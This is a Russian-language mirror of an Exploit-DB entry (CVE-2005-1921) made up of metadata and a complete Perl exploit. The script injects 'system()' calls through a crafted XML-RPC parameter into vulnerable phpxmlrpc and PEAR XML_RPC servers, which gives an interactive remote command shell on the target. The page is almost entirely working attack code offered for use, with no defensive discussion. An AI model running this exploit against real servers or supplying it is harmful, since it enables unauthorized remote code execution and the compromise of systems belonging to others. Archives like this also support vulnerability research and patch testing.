- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1084
- Проверка EDB
-
- Пройдено
- Автор
- MIKE RIFONE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2005-1921
- Дата публикации
- 2005-07-04
Код:
#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************
use LWP::UserAgent;
$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");
$host = $ARGV[0];
if ( !$host )
{
die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
}
while ( $host )
{
print "xmlrpc\@\#";
$exec = <STDIN>;
$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";
$send = new HTTP::Request POST => $host;
$send->content($data);
$gots = $brws->request($send);
$show = $gots->content;
if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
{
print $2 . "\n";
}
else
{
print "$show\n";
}
}
# milw0rm.com [2005-07-04]- Источник
- www.exploit-db.com
